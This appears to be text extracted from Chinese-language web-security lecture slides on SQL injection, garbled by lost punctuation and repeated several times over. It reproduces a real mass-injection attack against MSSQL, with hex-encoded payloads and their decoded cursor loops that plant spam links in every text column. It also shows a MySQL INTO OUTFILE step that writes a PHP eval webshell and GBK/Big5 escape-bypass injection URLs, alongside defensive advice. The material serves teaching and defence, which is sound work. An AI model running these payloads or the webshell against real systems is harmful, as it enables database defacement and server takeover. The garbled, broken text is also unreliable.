MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
